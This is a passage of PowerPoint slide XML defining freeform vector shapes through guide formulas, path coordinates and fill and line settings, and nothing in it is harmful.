                  <a:gd name="T55" fmla="*/ 61 h 225"/>
                  <a:gd name="T56" fmla="*/ 106 w 114"/>
                  <a:gd name="T57" fmla="*/ 57 h 225"/>
                  <a:gd name="T58" fmla="*/ 100 w 114"/>
                  <a:gd name="T59" fmla="*/ 52 h 225"/>
                  <a:gd name="T60" fmla="*/ 101 w 114"/>
                  <a:gd name="T61" fmla="*/ 62 h 225"/>
                  <a:gd name="T62" fmla="*/ 105 w 114"/>
                  <a:gd name="T63" fmla="*/ 69 h 225"/>
                  <a:gd name="T64" fmla="*/ 97 w 114"/>
                  <a:gd name="T65" fmla="*/ 81 h 225"/>
                  <a:gd name="T66" fmla="*/ 97 w 114"/>
                  <a:gd name="T67" fmla="*/ 91 h 225"/>
                  <a:gd name="T68" fmla="*/ 91 w 114"/>
                  <a:gd name="T69" fmla="*/ 114 h 225"/>
                  <a:gd name="T70" fmla="*/ 76 w 114"/>
                  <a:gd name="T71" fmla="*/ 163 h 225"/>
                  <a:gd name="T72" fmla="*/ 63 w 114"/>
                  <a:gd name="T73" fmla="*/ 210 h 225"/>
                  <a:gd name="T74" fmla="*/ 58 w 114"/>
                  <a:gd name="T75" fmla="*/ 217 h 225"/>
                  <a:gd name="T76" fmla="*/ 47 w 114"/>
                  <a:gd name="T77" fmla="*/ 218 h 225"/>
                  <a:gd name="T78" fmla="*/ 36 w 114"/>
                  <a:gd name="T79" fmla="*/ 225 h 225"/>
                  <a:gd name="T80" fmla="*/ 28 w 114"/>
                  <a:gd name="T81" fmla="*/ 222 h 225"/>
                  <a:gd name="T82" fmla="*/ 23 w 114"/>
                  <a:gd name="T83" fmla="*/ 219 h 225"/>
                  <a:gd name="T84" fmla="*/ 18 w 114"/>
                  <a:gd name="T85" fmla="*/ 219 h 225"/>
                  <a:gd name="T86" fmla="*/ 11 w 114"/>
                  <a:gd name="T87" fmla="*/ 212 h 225"/>
                  <a:gd name="T88" fmla="*/ 10 w 114"/>
                  <a:gd name="T89" fmla="*/ 205 h 225"/>
                  <a:gd name="T90" fmla="*/ 6 w 114"/>
                  <a:gd name="T91" fmla="*/ 200 h 225"/>
                  <a:gd name="T92" fmla="*/ 9 w 114"/>
                  <a:gd name="T93" fmla="*/ 186 h 225"/>
                  <a:gd name="T94" fmla="*/ 6 w 114"/>
                  <a:gd name="T95" fmla="*/ 180 h 225"/>
                  <a:gd name="T96" fmla="*/ 0 w 114"/>
                  <a:gd name="T97" fmla="*/ 169 h 225"/>
                  <a:gd name="T98" fmla="*/ 3 w 114"/>
                  <a:gd name="T99" fmla="*/ 153 h 225"/>
                  <a:gd name="T100" fmla="*/ 8 w 114"/>
                  <a:gd name="T101" fmla="*/ 150 h 225"/>
                  <a:gd name="T102" fmla="*/ 19 w 114"/>
                  <a:gd name="T103" fmla="*/ 131 h 225"/>
                  <a:gd name="T104" fmla="*/ 21 w 114"/>
                  <a:gd name="T105" fmla="*/ 120 h 225"/>
                  <a:gd name="T106" fmla="*/ 18 w 114"/>
                  <a:gd name="T107" fmla="*/ 116 h 225"/>
                  <a:gd name="T108" fmla="*/ 16 w 114"/>
                  <a:gd name="T109" fmla="*/ 111 h 225"/>
                  <a:gd name="T110" fmla="*/ 14 w 114"/>
                  <a:gd name="T111" fmla="*/ 101 h 225"/>
                  <a:gd name="T112" fmla="*/ 13 w 114"/>
                  <a:gd name="T113" fmla="*/ 92 h 225"/>
                  <a:gd name="T114" fmla="*/ 11 w 114"/>
                  <a:gd name="T115" fmla="*/ 86 h 225"/>
                  <a:gd name="T116" fmla="*/ 17 w 114"/>
                  <a:gd name="T117" fmla="*/ 77 h 225"/>
                  <a:gd name="T118" fmla="*/ 19 w 114"/>
                  <a:gd name="T119" fmla="*/ 65 h 225"/>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114"/>
                  <a:gd name="T181" fmla="*/ 0 h 225"/>
                  <a:gd name="T182" fmla="*/ 114 w 114"/>
                  <a:gd name="T183" fmla="*/ 225 h 225"/>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114" h="225">
                    <a:moveTo>
                      <a:pt x="22" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="65"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36340" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3426" y="3139"/>
                <a:ext cx="114" cy="225"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 114"/>
                  <a:gd name="T1" fmla="*/ 65 h 225"/>
                  <a:gd name="T2" fmla="*/ 32 w 114"/>
                  <a:gd name="T3" fmla="*/ 62 h 225"/>
                  <a:gd name="T4" fmla="*/ 36 w 114"/>
                  <a:gd name="T5" fmla="*/ 62 h 225"/>
                  <a:gd name="T6" fmla="*/ 45 w 114"/>
                  <a:gd name="T7" fmla="*/ 58 h 225"/>
                  <a:gd name="T8" fmla="*/ 50 w 114"/>
                  <a:gd name="T9" fmla="*/ 60 h 225"/>
                  <a:gd name="T10" fmla="*/ 49 w 114"/>
                  <a:gd name="T11" fmla="*/ 56 h 225"/>
                  <a:gd name="T12" fmla="*/ 58 w 114"/>
                  <a:gd name="T13" fmla="*/ 51 h 225"/>
                  <a:gd name="T14" fmla="*/ 63 w 114"/>
                  <a:gd name="T15" fmla="*/ 51 h 225"/>
                  <a:gd name="T16" fmla="*/ 62 w 114"/>
                  <a:gd name="T17" fmla="*/ 45 h 225"/>
                  <a:gd name="T18" fmla="*/ 67 w 114"/>
                  <a:gd name="T19" fmla="*/ 44 h 225"/>
                  <a:gd name="T20" fmla="*/ 73 w 114"/>
                  <a:gd name="T21" fmla="*/ 40 h 225"/>
                  <a:gd name="T22" fmla="*/ 70 w 114"/>
                  <a:gd name="T23" fmla="*/ 36 h 225"/>
                  <a:gd name="T24" fmla="*/ 72 w 114"/>
                  <a:gd name="T25" fmla="*/ 34 h 225"/>
                  <a:gd name="T26" fmla="*/ 75 w 114"/>
                  <a:gd name="T27" fmla="*/ 31 h 225"/>
                  <a:gd name="T28" fmla="*/ 74 w 114"/>
                  <a:gd name="T29" fmla="*/ 22 h 225"/>
                  <a:gd name="T30" fmla="*/ 76 w 114"/>
                  <a:gd name="T31" fmla="*/ 22 h 225"/>
                  <a:gd name="T32" fmla="*/ 80 w 114"/>
                  <a:gd name="T33" fmla="*/ 26 h 225"/>
                  <a:gd name="T34" fmla="*/ 87 w 114"/>
                  <a:gd name="T35" fmla="*/ 19 h 225"/>
                  <a:gd name="T36" fmla="*/ 89 w 114"/>
                  <a:gd name="T37" fmla="*/ 13 h 225"/>
                  <a:gd name="T38" fmla="*/ 89 w 114"/>
                  <a:gd name="T39" fmla="*/ 5 h 225"/>
                  <a:gd name="T40" fmla="*/ 93 w 114"/>
                  <a:gd name="T41" fmla="*/ 0 h 225"/>
                  <a:gd name="T42" fmla="*/ 99 w 114"/>
                  <a:gd name="T43" fmla="*/ 7 h 225"/>
                  <a:gd name="T44" fmla="*/ 104 w 114"/>
                  <a:gd name="T45" fmla="*/ 11 h 225"/>
                  <a:gd name="T46" fmla="*/ 108 w 114"/>
                  <a:gd name="T47" fmla="*/ 30 h 225"/>
                  <a:gd name="T48" fmla="*/ 110 w 114"/>
                  <a:gd name="T49" fmla="*/ 41 h 225"/>
                  <a:gd name="T50" fmla="*/ 114 w 114"/>
                  <a:gd name="T51" fmla="*/ 50 h 225"/>
                  <a:gd name="T52" fmla="*/ 114 w 114"/>
                  <a:gd name="T53" fmla="*/ 54 h 225"/>
                  <a:gd name="T54" fmla="*/ 109 w 114"/>
                  <a:gd name="T55" fmla="*/ 61 h 225"/>
                  <a:gd name="T56" fmla="*/ 106 w 114"/>
                  <a:gd name="T57" fmla="*/ 57 h 225"/>
                  <a:gd name="T58" fmla="*/ 100 w 114"/>
                  <a:gd name="T59" fmla="*/ 52 h 225"/>
                  <a:gd name="T60" fmla="*/ 101 w 114"/>
                  <a:gd name="T61" fmla="*/ 62 h 225"/>
                  <a:gd name="T62" fmla="*/ 105 w 114"/>
                  <a:gd name="T63" fmla="*/ 69 h 225"/>
                  <a:gd name="T64" fmla="*/ 97 w 114"/>
                  <a:gd name="T65" fmla="*/ 81 h 225"/>
                  <a:gd name="T66" fmla="*/ 97 w 114"/>
                  <a:gd name="T67" fmla="*/ 91 h 225"/>
                  <a:gd name="T68" fmla="*/ 91 w 114"/>
                  <a:gd name="T69" fmla="*/ 114 h 225"/>
                  <a:gd name="T70" fmla="*/ 76 w 114"/>
                  <a:gd name="T71" fmla="*/ 163 h 225"/>
                  <a:gd name="T72" fmla="*/ 63 w 114"/>
                  <a:gd name="T73" fmla="*/ 210 h 225"/>
                  <a:gd name="T74" fmla="*/ 58 w 114"/>
                  <a:gd name="T75" fmla="*/ 217 h 225"/>
                  <a:gd name="T76" fmla="*/ 47 w 114"/>
                  <a:gd name="T77" fmla="*/ 218 h 225"/>
                  <a:gd name="T78" fmla="*/ 36 w 114"/>
                  <a:gd name="T79" fmla="*/ 225 h 225"/>
                  <a:gd name="T80" fmla="*/ 28 w 114"/>
                  <a:gd name="T81" fmla="*/ 222 h 225"/>
                  <a:gd name="T82" fmla="*/ 23 w 114"/>
                  <a:gd name="T83" fmla="*/ 219 h 225"/>
                  <a:gd name="T84" fmla="*/ 18 w 114"/>
                  <a:gd name="T85" fmla="*/ 219 h 225"/>
                  <a:gd name="T86" fmla="*/ 11 w 114"/>
                  <a:gd name="T87" fmla="*/ 212 h 225"/>
                  <a:gd name="T88" fmla="*/ 10 w 114"/>
                  <a:gd name="T89" fmla="*/ 205 h 225"/>
                  <a:gd name="T90" fmla="*/ 6 w 114"/>
                  <a:gd name="T91" fmla="*/ 200 h 225"/>
                  <a:gd name="T92" fmla="*/ 9 w 114"/>
                  <a:gd name="T93" fmla="*/ 186 h 225"/>
                  <a:gd name="T94" fmla="*/ 6 w 114"/>
                  <a:gd name="T95" fmla="*/ 180 h 225"/>
                  <a:gd name="T96" fmla="*/ 0 w 114"/>
                  <a:gd name="T97" fmla="*/ 169 h 225"/>
                  <a:gd name="T98" fmla="*/ 3 w 114"/>
                  <a:gd name="T99" fmla="*/ 153 h 225"/>
                  <a:gd name="T100" fmla="*/ 8 w 114"/>
                  <a:gd name="T101" fmla="*/ 150 h 225"/>
                  <a:gd name="T102" fmla="*/ 19 w 114"/>
                  <a:gd name="T103" fmla="*/ 131 h 225"/>
                  <a:gd name="T104" fmla="*/ 21 w 114"/>
                  <a:gd name="T105" fmla="*/ 120 h 225"/>
                  <a:gd name="T106" fmla="*/ 18 w 114"/>
                  <a:gd name="T107" fmla="*/ 116 h 225"/>
                  <a:gd name="T108" fmla="*/ 16 w 114"/>
                  <a:gd name="T109" fmla="*/ 111 h 225"/>
                  <a:gd name="T110" fmla="*/ 14 w 114"/>
                  <a:gd name="T111" fmla="*/ 101 h 225"/>
                  <a:gd name="T112" fmla="*/ 13 w 114"/>
                  <a:gd name="T113" fmla="*/ 92 h 225"/>
                  <a:gd name="T114" fmla="*/ 11 w 114"/>
                  <a:gd name="T115" fmla="*/ 86 h 225"/>
                  <a:gd name="T116" fmla="*/ 17 w 114"/>
                  <a:gd name="T117" fmla="*/ 77 h 225"/>
                  <a:gd name="T118" fmla="*/ 19 w 114"/>
                  <a:gd name="T119" fmla="*/ 65 h 225"/>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114"/>
                  <a:gd name="T181" fmla="*/ 0 h 225"/>
                  <a:gd name="T182" fmla="*/ 114 w 114"/>
                  <a:gd name="T183" fmla="*/ 225 h 225"/>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114" h="225">
                    <a:moveTo>
                      <a:pt x="22" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="131"/>
